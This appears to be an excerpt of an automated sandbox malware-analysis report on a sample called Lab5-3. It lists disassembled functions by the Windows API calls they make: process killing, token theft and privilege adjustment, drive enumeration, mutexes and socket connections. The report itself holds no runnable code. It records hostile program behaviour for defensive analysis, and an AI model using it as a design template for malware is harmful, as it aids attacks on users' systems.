                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumOpenmalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 223765245-0
                                                                                                            • Opcode ID: 3eb00485097a0efc389383e459fee79e4f5da064f4d795ef9d4190b38b54034c
                                                                                                            • Instruction ID: b06ed3647f58f50ca9b74a8b07a3737af7feba6fd09c6bc6392e86ca34e10b16
                                                                                                            • Opcode Fuzzy Hash: 3eb00485097a0efc389383e459fee79e4f5da064f4d795ef9d4190b38b54034c
                                                                                                            • Instruction Fuzzy Hash: 9641E570A40209ABEB309B60DC4ABAF7778FF05720F104276ED12A62D0D77459498B99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(?,00000000,?), ref: 004129DD
                                                                                                            • CryptAcquireContextW.ADVAPI32(00000032,00000000,00000001,00000001,F0000000), ref: 004129FB
                                                                                                            • CryptGenRandom.ADVAPI32(00000032,642E7470,00006C6C), ref: 00412A0E
                                                                                                            • CryptReleaseContext.ADVAPI32(00000032,00000000), ref: 00412A1C
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00412A3A
                                                                                                            • CryptAcquireContextW.ADVAPI32(00000032,00000000,00000001,00000001,F0000000), ref: 00412A6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Context$Acquire$AddressLibraryLoadProcRandomRelease
                                                                                                            • String ID: bcry$pt.d
                                                                                                            • API String ID: 1691255365-3497837158
                                                                                                            • Opcode ID: 83d9abf2b0ec9711330afaab52501315e054c9892cdc4569466ecd92e9c808ff
                                                                                                            • Instruction ID: 3b119af7abe073dc8e536e59161ad5eccd177bddd3957992fc37f9f76aceeb4b
                                                                                                            • Opcode Fuzzy Hash: 83d9abf2b0ec9711330afaab52501315e054c9892cdc4569466ecd92e9c808ff
                                                                                                            • Instruction Fuzzy Hash: AA41087190020CEAEF10CFD0DD49BDEBFB9FF18745F108119E514AA261E7B65A98CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtOpenProcessToken.NTDLL(000000FF,00000008,74DF3340), ref: 004127C2
                                                                                                            • malloc.MSVCRT ref: 004127CD
                                                                                                            • NtQueryInformationToken.NTDLL ref: 004127EB
                                                                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 004127FB
                                                                                                            • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,00000000,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 0041280C
                                                                                                            • SetFileSecurityW.KERNELBASE(?,00000001,?,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412823
                                                                                                            • SetFileSecurityW.KERNELBASE(74DF3530,00000004,?,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412832
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412846
                                                                                                            • free.MSVCRT(00000000,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412851
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Security$DescriptorFileToken$CloseHandleInformationInitializeOpenOwnerProcessQueryfreemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4059018608-0
                                                                                                            • Opcode ID: 15aa378bae738879ea2419c1c7e040c5f48cc7033844b89ff34418c674939ec5
                                                                                                            • Instruction ID: 4e88f05283761bd4f385d5fa76b939d32f67dda893b8ea24b93715774626ec73
                                                                                                            • Opcode Fuzzy Hash: 15aa378bae738879ea2419c1c7e040c5f48cc7033844b89ff34418c674939ec5
                                                                                                            • Instruction Fuzzy Hash: EC216271A00209ABEB209FA59D48FEF7BBCEF48710F044179F914E2290D7B8D954C7A8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtOpenProcessToken.NTDLL(000000FF,00000028,?), ref: 004125CE
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004125FC
                                                                                                            • NtAdjustPrivilegesToken.NTDLL ref: 0041262B
                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 00412670
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Token$AdjustChangeCloseFindLookupNotificationOpenPrivilegePrivilegesProcessValue
                                                                                                            • String ID: &<SW
                                                                                                            • API String ID: 2977234922-3992320458
                                                                                                            • Opcode ID: 52e411f7996a4c8c5f69483f5eb70606cc039dcdc878e8dcc789e2a861f6a3b3
                                                                                                            • Instruction ID: 02cd908954539161bc6f5028b2939703fa4e984395d6ca8e2fc53d9dc02c7415
                                                                                                            • Opcode Fuzzy Hash: 52e411f7996a4c8c5f69483f5eb70606cc039dcdc878e8dcc789e2a861f6a3b3
                                                                                                            • Instruction Fuzzy Hash: 9F219074D0424DABEB00DFE4DD09BEEBBB8EF19304F004269E950B61E1E7B456498B94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00416745
                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00416760
                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000), ref: 00416770
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000001,?,?,00000000,00000000), ref: 00416788
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,00000000,00000000), ref: 00416797
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 0041679E
                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004167AB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004167B6
                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000), ref: 004167B8
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000001,?,?,00000000,00000000), ref: 004167CA
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,00000000,00000000), ref: 004167D9
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004167E2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseHandle$CurrentOpenProcess32Terminate$CreateFirstNextSnapshotToolhelp32
                                                                                                            • String ID: ;~A
                                                                                                            • API String ID: 3774302331-1729689117
                                                                                                            • Opcode ID: 1d03e9f39f2ef77b44af329925a3fe6d288d84525e4fe6b41f23d60ade6cd124
                                                                                                            • Instruction ID: 8d7da5227f3de543adb6aed03ce5231c5ae460c615805ddaa61a7346ca68f397
                                                                                                            • Opcode Fuzzy Hash: 1d03e9f39f2ef77b44af329925a3fe6d288d84525e4fe6b41f23d60ade6cd124
                                                                                                            • Instruction Fuzzy Hash: 15212B327002246BD7305B249C89BEFB77CEB48755F05417AF918E22C0DB748D8186E9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004175E4
                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 0041761F
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?), ref: 00417640
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,0000000A,00000002), ref: 00417653
                                                                                                            • GetTokenInformation.KERNELBASE(00000002,0000000A(TokenIntegrityLevel),?,00000038,?), ref: 0041766C
                                                                                                            • DuplicateToken.ADVAPI32(00000002,00000002,?), ref: 00417696
                                                                                                            • SetThreadToken.KERNELBASE(00000000,?), ref: 004176A5
                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 004176B1
                                                                                                            • CloseHandle.KERNEL32(00000002), ref: 004176B6
                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 004176B9
                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004176C9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004176DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseToken$ChangeFindHandleNotificationOpenProcessProcess32$CreateDuplicateFirstInformationNextSnapshotThreadToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 2270357333-0
                                                                                                            • Opcode ID: 3b5b18edfd2c9dd418df81785a26925a0707eec349329cdc6f3f4d79da96cbe6
                                                                                                            • Instruction ID: 908d1bf2e71a0210d80d85f2ec9f530c41a74aa39f2c1480dfb23c3d77f0b960
                                                                                                            • Opcode Fuzzy Hash: 3b5b18edfd2c9dd418df81785a26925a0707eec349329cdc6f3f4d79da96cbe6
                                                                                                            • Instruction Fuzzy Hash: 4D314371A04618ABDB209BA5DC49FEFBB78FF04751F004065F914A6250D7749A84CFA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Leave$EnterEntryExitInterlockedListThreadfreemallocwsprintf
                                                                                                            • String ID: 08:15:15$j
                                                                                                            • API String ID: 3435204808-2367131313
                                                                                                            • Opcode ID: 160a7f4be7cbe585e15d1becba8ecc5159376bd621b0fde84abb662330af2838
                                                                                                            • Instruction ID: 001e325ef954cee749345e79d4929c2f8876f0663c3fbe7c52bb857c770ef723
                                                                                                            • Opcode Fuzzy Hash: 160a7f4be7cbe585e15d1becba8ecc5159376bd621b0fde84abb662330af2838
                                                                                                            • Instruction Fuzzy Hash: B0319D345193429BC300EF60A81469FBBE0BF99B40F54556EF88497361EB34D98ACB9B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetShellWindow.USER32 ref: 004176F6
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0041770B
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0041771B
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,0000000A,?), ref: 0041772E
                                                                                                            • DuplicateToken.ADVAPI32(?,00000002,?), ref: 00417741
                                                                                                            • SetThreadToken.KERNELBASE(00000000,?), ref: 00417750
                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0041775F
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00417764
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00417767
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseProcessToken$HandleOpenThreadWindow$ChangeDuplicateFindNotificationShell
                                                                                                            • String ID:
                                                                                                            • API String ID: 3187664851-0
                                                                                                            • Opcode ID: 617befff72815a5f57aad3debdedfae897361e8bc4ec8a142a2c081e4234b7cd
                                                                                                            • Instruction ID: acc020a6b13fac94f33cae7c1e156f5862abaf0a61576001f5c8491b0005c111
                                                                                                            • Opcode Fuzzy Hash: 617befff72815a5f57aad3debdedfae897361e8bc4ec8a142a2c081e4234b7cd
                                                                                                            • Instruction Fuzzy Hash: 5511C635A00108BBDB119BE5EC09BEFBF78EF09751F0080A6F904D2260EB3199109BD4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • inet_addr.WS2_32(?), ref: 0041A35B
                                                                                                            • htons.WS2_32(000001BD), ref: 0041A365
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 0041A37B
                                                                                                            • ioctlsocket.WS2_32(00000000,8004667E,00419C59), ref: 0041A399
                                                                                                            • closesocket.WS2_32(00000000), ref: 0041A3A5
                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 0041A3B9
                                                                                                            • WSAGetLastError.WS2_32 ref: 0041A3C4
                                                                                                            • select.WS2_32(00000000,00000000,?,?,?), ref: 0041A41C
                                                                                                            • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0041A432
                                                                                                            • closesocket.WS2_32(00000000), ref: 0041A441
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocket$ErrorLastconnecthtonsinet_addrioctlsocketselectsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3769925765-0
                                                                                                            • Opcode ID: fbdcffe7282865730258060c418ac9f94931ae03a28c5248b7cce92d40dee657
                                                                                                            • Instruction ID: cf51ab9dcadbbf705db9e497f3b496682f909715bd7e76d91c5da044175e34ce
                                                                                                            • Opcode Fuzzy Hash: fbdcffe7282865730258060c418ac9f94931ae03a28c5248b7cce92d40dee657
                                                                                                            • Instruction Fuzzy Hash: 7531547091121CAADB109FA4DC4C7DF77B8EF09315F104295F824E62D0D7794A988F99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLogicalDrives.KERNEL32 ref: 0040FAE9
                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 0040FB21
                                                                                                            • malloc.MSVCRT ref: 0040FB3C
                                                                                                            • WNetGetConnectionW.MPR(?,00000004,00000200), ref: 0040FB53
                                                                                                            • PathRemoveBackslashW.SHLWAPI(00000004), ref: 0040FB5E
                                                                                                            • OpenThreadToken.ADVAPI32(000000FE,0000000A,00000001,?), ref: 0040FB6E
                                                                                                            • DuplicateToken.ADVAPI32(?,00000002,?), ref: 0040FB86
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000FD80,00000000,00000000,?), ref: 0040FBA7
                                                                                                            • free.MSVCRT(00000000), ref: 0040FBC4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ThreadToken$BackslashConnectionCreateDriveDrivesDuplicateLogicalOpenPathRemoveTypefreemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4235455504-0
                                                                                                            • Opcode ID: 6d0325ebd64f8f8d08d5298e3f5865116b9e13268f4b1a340873b4408924e14d
                                                                                                            • Instruction ID: cc9fd43253aa1b5df0cf1581ee85b6af3df70c619eb79c708fe252a65ade6f61
                                                                                                            • Opcode Fuzzy Hash: 6d0325ebd64f8f8d08d5298e3f5865116b9e13268f4b1a340873b4408924e14d
                                                                                                            • Instruction Fuzzy Hash: C83195B5A00209ABDB20DFA4DC59FEF77B8EF05350F104176E926E21D1E73499098B99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104), ref: 004174E8
                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 0041757A
                                                                                                            • FindNextVolumeW.KERNEL32(00000000,?,00000104), ref: 004175A9
                                                                                                            • FindVolumeClose.KERNEL32(00000000), ref: 004175B4
                                                                                                            • ExitThread.KERNEL32 ref: 004175BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FindVolume$CloseDeviceExitFirstNextQueryThread
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 9496724-1684325040
                                                                                                            • Opcode ID: 32b5c1e35a10caa76a4138edc3ff6a14eb70fe0d5499fd002f8ba94530bc533d
                                                                                                            • Instruction ID: a959f1489e723b3308e5144693ff93d7ce13e0ea6e19a8b9aa47c41488bd1cd1
                                                                                                            • Opcode Fuzzy Hash: 32b5c1e35a10caa76a4138edc3ff6a14eb70fe0d5499fd002f8ba94530bc533d
                                                                                                            • Instruction Fuzzy Hash: DC219674904318EADF20EB60DC48BFB737AEB54314F0081B6D62893592EB745EC48BAC
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000), ref: 004177A3
                                                                                                            • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 004177C9
                                                                                                            • GetTokenInformation.KERNELBASE(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 004177E8
                                                                                                            • GetTokenInformation.KERNELBASE(?,0000000A(TokenIntegrityLevel),?,00000038,?), ref: 00417800
                                                                                                            • CloseHandle.KERNEL32(00000002), ref: 00417808
                                                                                                              • Part of subcall function 004175D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004175E4
                                                                                                              • Part of subcall function 004175D0: Process32First.KERNEL32(00000000,00000128), ref: 0041761F
                                                                                                              • Part of subcall function 004175D0: OpenProcess.KERNEL32(00001000,00000000,?), ref: 00417640
                                                                                                              • Part of subcall function 004175D0: OpenProcessToken.ADVAPI32(00000000,0000000A,00000002), ref: 00417653
                                                                                                              • Part of subcall function 004175D0: GetTokenInformation.KERNELBASE(00000002,0000000A(TokenIntegrityLevel),?,00000038,?), ref: 0041766C
                                                                                                              • Part of subcall function 004175D0: DuplicateToken.ADVAPI32(00000002,00000002,?), ref: 00417696
                                                                                                              • Part of subcall function 004175D0: SetThreadToken.KERNELBASE(00000000,?), ref: 004176A5
                                                                                                              • Part of subcall function 004175D0: FindCloseChangeNotification.KERNEL32(?), ref: 004176B1
                                                                                                              • Part of subcall function 004175D0: CloseHandle.KERNEL32(00000002), ref: 004176B6
                                                                                                              • Part of subcall function 004175D0: FindCloseChangeNotification.KERNEL32(00000000), ref: 004176B9
                                                                                                              • Part of subcall function 004175D0: Process32Next.KERNEL32(00000000,00000128), ref: 004176C9
                                                                                                              • Part of subcall function 004175D0: CloseHandle.KERNEL32(00000000), ref: 004176DB
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00417831
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Token$Close$HandleInformation$OpenProcess$ChangeFindNotificationProcess32$CreateDuplicateFirstNextSnapshotThreadToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 66315925-0
                                                                                                            • Opcode ID: d36781a76d016ade7ec61e25fa5d16699151caae10c2ec791486d6a3ebac7b08
                                                                                                            • Instruction ID: bb76c81c99f9f6c75eb351999650ff105598f7ca62c4df14ebc6082fc51888b3
                                                                                                            • Opcode Fuzzy Hash: d36781a76d016ade7ec61e25fa5d16699151caae10c2ec791486d6a3ebac7b08
                                                                                                            • Instruction Fuzzy Hash: 13116371508305BEE620EF50DD05EAB7BECEB44761F008526BA64C61E0E730DD59DBE6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • OpenMutexA.KERNEL32(00000000,00000000,00000000), ref: 004128F8
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00412905
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Mutex$CreateOpen
                                                                                                            • String ID: g^$sM
                                                                                                            • API String ID: 4030545807-4124696053
                                                                                                            • Opcode ID: 5d216a052c4bb22f2b4fbe9b591bea8ecd66a3b6c7a2ce6433abb047d94da898
                                                                                                            • Instruction ID: 0f3efbeef4f09248e61212af30985377b4f0e49588f48f69a01edcf33dd71253
                                                                                                            • Opcode Fuzzy Hash: 5d216a052c4bb22f2b4fbe9b591bea8ecd66a3b6c7a2ce6433abb047d94da898
                                                                                                            • Instruction Fuzzy Hash: F611D030D0828CA6EB209FA8D9027EDB774EF1534AF008258FC0476161E7B12695C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 0041AA12
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0041AA19
                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0041AA39
                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0041AA4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2406157124-0
                                                                                                            • Opcode ID: d92ac039da7aa32bc7706e49e5aac3a5b0418173c2370981066ef77299e24d90
                                                                                                            • Instruction ID: 4317f66145c16bb89c240afb23f47518667b00316ab38bca230fb5d7eb3fb0ab
                                                                                                            • Opcode Fuzzy Hash: d92ac039da7aa32bc7706e49e5aac3a5b0418173c2370981066ef77299e24d90
                                                                                                            • Instruction Fuzzy Hash: 9EF0F971A00218BBDB10DFA1DD09AEEBBBCEF08751F0080A5BA04E2250D7309A04DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 004176F0: GetShellWindow.USER32 ref: 004176F6
                                                                                                            • SetThreadToken.KERNELBASE(00000000,00000000), ref: 0040FA89
                                                                                                            • ExitThread.KERNEL32 ref: 0040FA9D
                                                                                                              • Part of subcall function 0040FAE0: GetLogicalDrives.KERNEL32 ref: 0040FAE9
